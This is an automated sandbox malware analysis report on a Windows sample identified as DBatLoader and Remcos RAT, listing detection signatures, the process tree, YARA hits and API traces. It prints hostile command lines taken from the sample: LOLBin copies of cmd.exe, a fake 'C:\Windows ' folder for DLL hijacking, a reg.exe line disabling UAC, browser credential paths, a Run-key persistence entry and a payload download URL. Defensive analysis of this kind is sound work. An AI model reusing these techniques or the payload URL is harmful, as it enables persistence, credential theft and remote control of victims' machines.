
Windows Analysis Report
nft438A5fN.exe

Overview

General Information

Sample name: nft438A5fN.exe (renamed because original name is a hash value)
Original sample name: 02eec111ba55308c1d91c49ee08cb2d6c00d50893596ceef03f7664403175617.exe
Analysis ID: 1562863
MD5: 1a4d920b70293f85958a9a2cde581f6f
SHA1: 756015ae8f1b03f14bc1126e6b2183a383631186
SHA256: 02eec111ba55308c1d91c49ee08cb2d6c00d50893596ceef03f7664403175617
Tags: doganalecmdexeuser-JAMESWT_MHT

Detection

DBatLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queues an APC in another process (thread injection)
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Child Processes Of SndVol.exe
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • nft438A5fN.exe (PID: 520 cmdline: "C:\Users\user\Desktop\nft438A5fN.exe" MD5: 1A4D920B70293F85958A9A2CDE581F6F)
    • cmd.exe (PID: 908 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ovggtquW.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • esentutl.exe (PID: 1508 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 5200 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • alpha.pif (PID: 2160 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 5576 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 5588 cmdline: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • xpha.pif (PID: 6188 cmdline: C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • alpha.pif (PID: 2160 cmdline: C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 2940 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 3016 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • esentutl.exe (PID: 3700 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\nft438A5fN.exe /d C:\\Users\\Public\\Libraries\\Wuqtggvo.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
      • conhost.exe (PID: 2916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • colorcpl.exe (PID: 4280 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
      • WerFault.exe (PID: 6588 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 652 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 1280 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 660 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • Wuqtggvo.PIF (PID: 7100 cmdline: "C:\Users\Public\Libraries\Wuqtggvo.PIF" MD5: 1A4D920B70293F85958A9A2CDE581F6F)
    • colorcpl.exe (PID: 432 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
      • WerFault.exe (PID: 1508 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 668 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 5444 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 676 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • Wuqtggvo.PIF (PID: 2888 cmdline: "C:\Users\Public\Libraries\Wuqtggvo.PIF" MD5: 1A4D920B70293F85958A9A2CDE581F6F)
    • SndVol.exe (PID: 1376 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
      • WerFault.exe (PID: 3148 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 608 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 6736 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 624 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Download Url": ["https://drive.usercontent.google.com/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi"]}
Source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security
Source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown | Strings:
  • 0x6ca48:$a1: Remcos restarted by watchdog!
  • 0x6cfc0:$a3: %02i:%02i:%02i:%03i
Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security
[37 entries in total; only the first are shown]
Source: 33.2.SndVol.exe.3290000.0.raw.unpack | Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security
Source: 33.2.SndVol.exe.3290000.0.raw.unpack | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 33.2.SndVol.exe.3290000.0.raw.unpack | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 33.2.SndVol.exe.3290000.0.raw.unpack | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown | Strings:
  • 0x6c4b8:$a1: Remcos restarted by watchdog!
  • 0x6ca30:$a3: %02i:%02i:%02i:%03i
Source: 33.2.SndVol.exe.3290000.0.raw.unpack | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown | Strings:
  • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6657c:$str_b2: Executing file:
  • 0x675fc:$str_b3: GetDirectListeningPort
  • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x67128:$str_b7: \update.vbs
  • 0x665a4:$str_b9: Downloaded file:
  • 0x66590:$str_b10: Downloading file:
  • 0x66634:$str_b12: Failed to upload file:
  • 0x675c4:$str_b13: StartForward
  • 0x675e4:$str_b14: StopForward
  • 0x67080:$str_b15: fso.DeleteFile "
  • 0x67014:$str_b16: On Error Resume Next
  • 0x670b0:$str_b17: fso.DeleteFolder "
  • 0x66624:$str_b18: Uploaded file:
  • 0x665e4:$str_b19: Unable to delete:
  • 0x67048:$str_b20: while fso.FileExists("
  • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
[38 entries in total; only the first are shown]

System Summary

Source: File created | Author: frack113, Nasreddine Bencherchali | Data: EventID: 11, Image: C:\Users\user\Desktop\nft438A5fN.exe, ProcessId: 520, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.pif, NewProcessName: C:\Users\Public\alpha.pif, OriginalFileName: C:\Users\Public\alpha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ovggtquW.cmd" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 908, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , ProcessId: 2160, ProcessName: alpha.pif
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Wuqtggvo.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\nft438A5fN.exe, ProcessId: 520, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wuqtggvo
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Wuqtggvo.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\nft438A5fN.exe, ProcessId: 520, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wuqtggvo
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.pif, NewProcessName: C:\Users\Public\alpha.pif, OriginalFileName: C:\Users\Public\alpha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ovggtquW.cmd" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 908, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , ProcessId: 2160, ProcessName: alpha.pif
Source: Process started | Author: X__Junior (Nextron Systems) | Data: Command: C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 608, CommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 608, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WerFault.exe, NewProcessName: C:\Windows\SysWOW64\WerFault.exe, OriginalFileName: C:\Windows\SysWOW64\WerFault.exe, ParentCommandLine: C:\Windows\System32\SndVol.exe, ParentImage: C:\Windows\SysWOW64\SndVol.exe, ParentProcessId: 1376, ParentProcessName: SndVol.exe, ProcessCommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 608, ProcessId: 3148, ProcessName: WerFault.exe
Timestamp: 2024-11-26T08:12:15.955374+0100 | SID: 2028371 | Severity: 3 | Classtype: Unknown Traffic | Source IP: 192.168.2.8 | Source Port: 49706 | Destination IP: 142.250.181.129 | Destination Port: 443 | Protocol: TCP

AV Detection

Source: nft438A5fN.exe | Avira: detected
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF | Avira: detection malicious, Label: TR/AD.Nekark.iteef
Source: nft438A5fN.exe | Malware Configuration Extractor: DBatLoader {"Download Url": ["https://drive.usercontent.google.com/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi"]}
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF | ReversingLabs: Detection: 57%
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF | Virustotal: Detection: 68%
Source: nft438A5fN.exe | ReversingLabs: Detection: 57%
Source: nft438A5fN.exe | Virustotal: Detection: 68%
Source: Yara match | File source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF | Joe Sandbox ML: detected
Source: nft438A5fN.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 11_2_032338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,11_2_032338C8
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 21_2_02EB38C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,21_2_02EB38C8
Source: nft438A5fN.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Source: Yara match | File source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR

Privilege Escalation

Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 11_2_03207538 _wcslen,CoGetObject,11_2_03207538
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 21_2_02E87538 _wcslen,CoGetObject,21_2_02E87538
Source: nft438A5fN.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.8:49706 version: TLS 1.2
                Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: easinvoker.pdb source: nft438A5fN.exe, nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1613117060.0000000002346000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.00000000395DE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1585864121.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000A.00000002.1599731448.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000002.1715376572.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000018.00000000.1733704656.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001B.00000002.1750139322.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001C.00000000.1755754278.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
                Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.1589575934.0000000005850000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000002.1712179050.00000000000F1000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.6.dr
                Source: Binary string: easinvoker.pdbH source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: easinvoker.pdbGCTL source: nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1592952655.000000003A53F000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1613117060.0000000002346000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1592952655.000000003A510000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.00000000395DE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000F.00000002.1715376572.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000018.00000000.1733704656.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001B.00000002.1750139322.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001C.00000000.1755754278.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
                Source: Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.1589575934.0000000005850000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000010.00000002.1712179050.00000000000F1000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.6.dr
Source: C:\Users\user\Desktop\nft438A5fN.exe | Code function: 0_2_02C95908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02C95908
Source: C:\Users\Public\alpha.pif | Code function: 7_2_00050207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,7_2_00050207
Source: C:\Users\Public\alpha.pif | Code function: 7_2_0005589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,7_2_0005589A
Source: C:\Users\Public\alpha.pif | Code function: 7_2_00063E66 FindFirstFileW,FindNextFileW,FindClose,7_2_00063E66
Source: C:\Users\Public\alpha.pif | Code function: 7_2_00054EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,7_2_00054EC1
Source: C:\Users\Public\alpha.pif | Code function: 7_2_0004532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,7_2_0004532E
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 11_2_0321C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0321C322
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 11_2_0320C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,11_2_0320C388
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 11_2_0320928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_0320928E
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 11_2_032096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_032096A0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 11_2_0320BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0320BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 11_2_03219B86 FindFirstFileW,FindNextFileW,FindNextFileW,11_2_03219B86
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 11_2_03207877 FindFirstFileW,FindNextFileW,11_2_03207877
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 11_2_03208847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,11_2_03208847
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 11_2_0324E8F9 FindFirstFileExA,11_2_0324E8F9
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 11_2_0320BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0320BD72
Source: C:\Users\Public\alpha.pif | Code function: 15_2_0005589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,15_2_0005589A
Source: C:\Users\Public\alpha.pif | Code function: 15_2_00050207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,15_2_00050207
Source: C:\Users\Public\alpha.pif | Code function: 15_2_00063E66 FindFirstFileW,FindNextFileW,FindClose,15_2_00063E66
Source: C:\Users\Public\alpha.pif | Code function: 15_2_00054EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,15_2_00054EC1
Source: C:\Users\Public\alpha.pif | Code function: 15_2_0004532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,15_2_0004532E
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 21_2_02E8928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,21_2_02E8928E
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 21_2_02E8C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,21_2_02E8C388
